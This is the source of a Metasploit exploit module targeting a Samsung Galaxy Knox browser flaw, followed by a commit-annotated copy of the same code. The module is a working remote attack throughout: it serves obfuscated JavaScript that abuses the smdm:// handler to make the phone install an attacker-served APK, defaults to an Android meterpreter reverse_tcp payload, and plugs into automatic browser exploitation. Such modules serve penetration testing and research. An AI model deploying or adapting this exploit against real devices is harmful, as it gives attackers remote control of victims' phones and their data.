metasploit-framework/modules/exploits/android/browser/samsung_knox_smdm_url.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'digest/md5'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::BrowserAutopwn

  VULN_CHECK_JS = "is_vuln = true;"

  autopwn_info(
    :os_name    => OperatingSystems::Match::ANDROID,
    :arch       => ARCH_ARMLE,
    :javascript => true,
    :rank       => ExcellentRanking,
    :vuln_test  => VULN_CHECK_JS
  )

  def initialize(info = {})
    super(update_info(info,
      'Name'                => 'Samsung Galaxy Knox Android Browser RCE',
      'Description'         => %q{
        A vulnerability exists in the Knox security component of the Samsung Galaxy
        firmware that allows a remote webpage to install an APK with arbitrary
        permissions.

        The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3,
        and Ace 4.
      },
      'License'             => MSF_LICENSE,
      'Author'              => [
        'Andre Moulu', # discovery and advisory
        'joev'   # msf module
      ],
      'References'          => [
        ['URL', 'http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html']
      ],
      'Platform'            => 'android',
      'Arch'                => ARCH_DALVIK,
      'DefaultOptions'      => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
      'Targets'             => [ [ 'Automatic', {} ] ],
      'DisclosureDate'      => 'Nov 12 2014',
      'DefaultTarget'       => 0,
      'BrowserRequirements' => {
        :source     => 'script',
        :os_name    => OperatingSystems::Match::ANDROID,
        :vuln_test  => VULN_CHECK_JS,
        :vuln_test_error => 'The client is not vulnerable.'
      }
    ))

    register_options([
      OptString.new('APK_VERSION', [
        false, "The update version to advertise to the client", "1337"
      ])
    ], self.class)


    deregister_options('JsObfuscate')
  end

  def on_request_uri(cli, req)
    if req.uri =~ /\.apk$/
      is_head = req.method.upcase == 'HEAD'
      print_status "Serving #{is_head ? 'metadata' : 'payload'}..."
      send_response(cli, is_head ? '' : payload.encoded, magic_headers)
    else
      super
    end
  end

  # The browser appears to be vulnerable, serve the exploit
  def on_request_exploit(cli, req, browser)
    print_status "Serving exploit..."
    send_response_html(cli, generate_html)
  end

  def magic_headers
    { 'Content-Length' => payload.encoded.length,
      'ETag' => Digest::MD5.hexdigest(payload.encoded),
      'x-amz-meta-apk-version' => datastore['APK_VERSION'] }
  end

  def generate_html
    %Q|
      <!doctype html>
      <html><body><script>
      #{exploit_js}
      </script></body></html>
    |
  end

  def exploit_js
    js_obfuscate %Q|

      setInterval(function(){
        var loc = window.location.href.replace(/[/.]$/g, '');
        window.location = 'smdm://#{rand_word}?update_url='+
          encodeURIComponent(loc)+'.apk';
      }, 500);

    |
  end

  def apk_url
    "#{get_uri.chomp('/')}/#{rand_word}.apk"
  end

  def rand_word
    Rex::Text.rand_text_alphanumeric(3+rand(12))
  end
end
Add module for samsung knox root exploit. 2014-11-12 15:53:20 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`
			`require 'digest/md5'`

			`class Metasploit3 < Msf::Exploit::Remote`

			`include Msf::Exploit::Remote::BrowserExploitServer`
			`include Msf::Exploit::Remote::BrowserAutopwn`

			`VULN_CHECK_JS = "is_vuln = true;"`

			`autopwn_info(`
			`:os_name => OperatingSystems::Match::ANDROID,`
			`:arch => ARCH_ARMLE,`
			`:javascript => true,`
			`:rank => ExcellentRanking,`
			`:vuln_test => VULN_CHECK_JS`
			`)`

			`def initialize(info = {})`
			`super(update_info(info,`
Not root, just arbitrary permissions. 2014-11-13 03:51:55 +00:00			`'Name' => 'Samsung Galaxy Knox Android Browser RCE',`
Add module for samsung knox root exploit. 2014-11-12 15:53:20 +00:00			`'Description' => %q{`
			`A vulnerability exists in the Knox security component of the Samsung Galaxy`
Not root, just arbitrary permissions. 2014-11-13 03:51:55 +00:00			`firmware that allows a remote webpage to install an APK with arbitrary`
Add module for samsung knox root exploit. 2014-11-12 15:53:20 +00:00			`permissions.`

			`The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3,`
			`and Ace 4.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [`
			`'Andre Moulu', # discovery and advisory`
			`'joev' # msf module`
			`],`
			`'References' => [`
Change URL to single line. 2014-11-12 16:56:51 +00:00			`['URL', 'http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html']`
Add module for samsung knox root exploit. 2014-11-12 15:53:20 +00:00			`],`
			`'Platform' => 'android',`
			`'Arch' => ARCH_DALVIK,`
			`'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },`
			`'Targets' => [ [ 'Automatic', {} ] ],`
			`'DisclosureDate' => 'Nov 12 2014',`
			`'DefaultTarget' => 0,`
			`'BrowserRequirements' => {`
			`:source => 'script',`
			`:os_name => OperatingSystems::Match::ANDROID,`
			`:vuln_test => VULN_CHECK_JS,`
			`:vuln_test_error => 'The client is not vulnerable.'`
			`}`
			`))`

			`register_options([`
			`OptString.new('APK_VERSION', [`
			`false, "The update version to advertise to the client", "1337"`
			`])`
			`], self.class)`


			`deregister_options('JsObfuscate')`
			`end`

			`def on_request_uri(cli, req)`
			`if req.uri =~ /\.apk$/`
			`is_head = req.method.upcase == 'HEAD'`
			`print_status "Serving #{is_head ? 'metadata' : 'payload'}..."`
			`send_response(cli, is_head ? '' : payload.encoded, magic_headers)`
			`else`
			`super`
			`end`
			`end`

			`# The browser appears to be vulnerable, serve the exploit`
			`def on_request_exploit(cli, req, browser)`
			`print_status "Serving exploit..."`
			`send_response_html(cli, generate_html)`
			`end`

			`def magic_headers`
			`{ 'Content-Length' => payload.encoded.length,`
			`'ETag' => Digest::MD5.hexdigest(payload.encoded),`
			`'x-amz-meta-apk-version' => datastore['APK_VERSION'] }`
			`end`

			`def generate_html`
			`%Q\|`
			`<!doctype html>`
			`<html><body><script>`
			`#{exploit_js}`
			`</script></body></html>`
			`\|`
			`end`

			`def exploit_js`
			`js_obfuscate %Q\|`

			`setInterval(function(){`
			`var loc = window.location.href.replace(/[/.]$/g, '');`
			`window.location = 'smdm://#{rand_word}?update_url='+`
			`encodeURIComponent(loc)+'.apk';`
			`}, 500);`

			`\|`
			`end`

			`def apk_url`
			`"#{get_uri.chomp('/')}/#{rand_word}.apk"`
			`end`

			`def rand_word`
			`Rex::Text.rand_text_alphanumeric(3+rand(12))`
			`end`
			`end`